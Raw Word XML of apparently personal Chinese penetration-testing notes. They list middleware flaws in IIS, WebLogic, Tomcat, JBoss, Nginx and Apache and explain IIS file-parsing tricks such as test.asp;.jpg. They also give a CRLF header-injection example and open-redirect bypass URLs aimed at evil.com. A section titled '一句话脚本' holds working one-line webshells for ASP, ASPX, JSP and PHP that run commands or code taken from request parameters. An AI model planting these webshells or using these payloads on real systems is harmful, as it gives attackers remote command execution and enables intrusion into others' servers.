    <w:p w14:paraId="46C47A21" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="7A8E1941" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="386BC794" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="19D44113" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="7ED1343D" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="007A3227">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE0D29" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRDefault="00BB3AB0" w:rsidP="00F922B5">
      <w:hyperlink r:id="rId164" w:history="1">
        <w:r w:rsidR="00F922B5" w:rsidRPr="003B6A56">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/192063.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DDBA142" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00F922B5"/>
    <w:p w14:paraId="3DC61FC4" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3227">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="009B1D8E">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD8448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PUT漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588B572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短文件名猜解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F922B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A5907D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4、解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4B61E" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13EB8B45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IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误，从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A9EE5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/test.asp/test.jpg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t>该目录中的任何文件都被 IIS 当作 asp 程序执行（特殊符号是“/”）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBEA650" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A538A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test.asp;.jpg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t>虽然该文件真正的后缀名是 “.jpg”，但由于含有特殊符号”;”，仍会被 IIS 当做 asp 程序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF0CD9" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269CCD1B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IIS7.5 文件解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68754A6A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test.jpg/.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B4BAE4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lastRenderedPageBreak/>
        <w:t>URL 中文件后缀是 .php ，便无论该文件是否存在，都直接交给 php 处理，而 php 又默认开启 “cgi.fix_pathinfo” ,会对文件进行“修理”，可谓“修理”？举个例子，当 php 遇到路径 “/aaa.xxx/bbb.yyy” 时，若 “/aaa.xxx/bbb.yyy” 不存在，则会去掉最后的 “bbb.yyy” ，然后判断 “/aaa.xxx” 是否存在，若存在，则把 “/aaa.xxx” 当作文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72BCBC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若有文件 test.jpg ，访问时在其后加 /.php ，便可以把 “test.jpg/.php” 交给 php ，php 修理文件路径 “test.jpg/.php” 得到 ”test.jpg” ，该文件存在，便把该文件作为 php 程序执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF2E2B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5B1876" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRPr="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C655D6" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eblogic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7CCF4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反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEA127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SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD94051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3、任意文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C853387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4、war后门文件部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D167C2F" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A7157B" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>omcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFD3A5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远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197311D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war后门文件部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60440D02" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB40003" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Jboss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D713759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反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B653D61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war后门文件部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F08961" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D33198" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="001267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Nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C226883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文件解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1050B1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目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF46DBF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3、CRLF注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22EAE3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4、目录穿越</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999F0A3" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B185E4" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A4C3A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解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB2317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目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677DF0E9" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65900664" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="00B5008B" w:rsidP="00B5008B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>LRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61520BCF" w14:textId="77777777"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举个例子，一般网站会在HTTP头中用Location: http://baidu.com这种方式来进行302跳转，所以我们能控制的内容就是Location:后面的XXX某个网址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BEA1B" w14:textId="77777777"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所以一个正常的302跳转包是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70C27C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HTTP/1.1 302 Moved Temporarily </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1DD20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Date: Fri, 27 Jun 2014 17:52:17 GMT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AECD271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Type: text/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A520D45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Length: 154 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3F033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nection: close </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2B018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Location: http://www.sina.com.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A3AD9" w14:textId="77777777"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但如果我们输入的是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10505E2B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http://www.sina.com.cn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set-cookie:JSPSESSID%3Dwooyun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76394819" w14:textId="77777777"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注入了一个换行，此时的返回包就会变成这样： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FD4EE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HTTP/1.1 302 Moved Temporarily </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE86D07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Date: Fri, 27 Jun 2014 17:52:17 GMT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB72B7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Type: text/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CDA21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Length: 154 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E29035E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nection: close </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0673361F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Location: http://www.sina.com.cn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFF83D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Set-cookie: JSPSESSID=wooyun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12FFBE" w14:textId="77777777" w:rsidR="00B5008B" w:rsidRPr="00B5008B" w:rsidRDefault="00B5008B" w:rsidP="00B5008B"/>
    <w:p w14:paraId="0CEA1616" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="0B5DF96D" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="2F367D40" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="586FD1FF" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="54D803FE" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="7E1E17BD" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381A026" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9C09F" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%eval request ("pwd")%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F8666" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="6523F3F5" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># ASPX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52F657" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%@ Page Language="Jscript"%&gt; &lt;%eval(Request.Item["pwd"],"unsafe");%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC13682" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="3B54D6F8" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># JSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7B558" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t xml:space="preserve">&lt;%Runtime.getRuntime().exec(request.getParameter("i"));%&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884D539" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="2AF4C6E5" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># PHP -&gt; REQUEST是在网页端输入变量访问，POST则是通过工具连接，基于C/S架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F1B35" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php @eval($_POST['pwd']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264375D4" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php eval($_REQUEST['pwd']); ?&gt;    # eval,使用php函数,如phpinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C1AFD" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php system($_REQUEST['pwd']); ?&gt;  # system,使用Linux系统命令,如ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740EA3" w14:textId="77777777" w:rsidR="00F823C0" w:rsidRPr="00F823C0" w:rsidRDefault="00F823C0" w:rsidP="00091445">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>&lt;?php echo system($_GET[cmd]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B625BEE" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w14:paraId="176D95B3" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w14:paraId="6214BE81" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="005474CB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ypass绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD49D5" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="00BB3AB0" w:rsidP="005474CB">
      <w:hyperlink r:id="rId165" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.t00ls.net/articles-46165.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54664A97" w14:textId="77777777" w:rsidR="00664EC7" w:rsidRDefault="00BB3AB0" w:rsidP="005474CB">
      <w:hyperlink r:id="rId166" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7348775E" w14:textId="77777777" w:rsidR="00664EC7" w:rsidRDefault="00664EC7" w:rsidP="005474CB"/>
    <w:p w14:paraId="3E183C4C" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="005474CB"/>
    <w:p w14:paraId="42CDFFDC" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>url跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD6300" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BED2A" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 直接跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233628F8" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225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没做任何限制，参数后直接跟要跳转过去的网址就行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE7B39" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:left w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:right w:val="single" w:sz="6" w:space="6" w:color="272822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ind w:left="495"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="66D9EF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="93A1A1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//www.landgrey.me/redirect.php?url=http://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A1E56" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:t>2. 协议一致性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4AA0FC" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225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当程序员校验跳转的网址协议必须为https时(有时候跳转不过去不会给提示)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EB1ED" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:left w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="272822"/>
          <w:right w:val="single" w:sz="6" w:space="6" w:color="272822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ind w:left="495"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="66D9EF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="93A1A1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//www.landgrey.me/redirect.php?url=https://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC846D" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="66D9EF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="66D9EF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C010D55" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB3AB0" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="93A1A1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r w:rsidR="00A14128" w:rsidRPr="008F549A">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.landgrey.me/redirect.php?url=http://www.landgrey.me.www.evil.com/untrust.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F695782" w14:textId="69B8C391" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过总结</w:t>
      </w:r>
    </w:p>
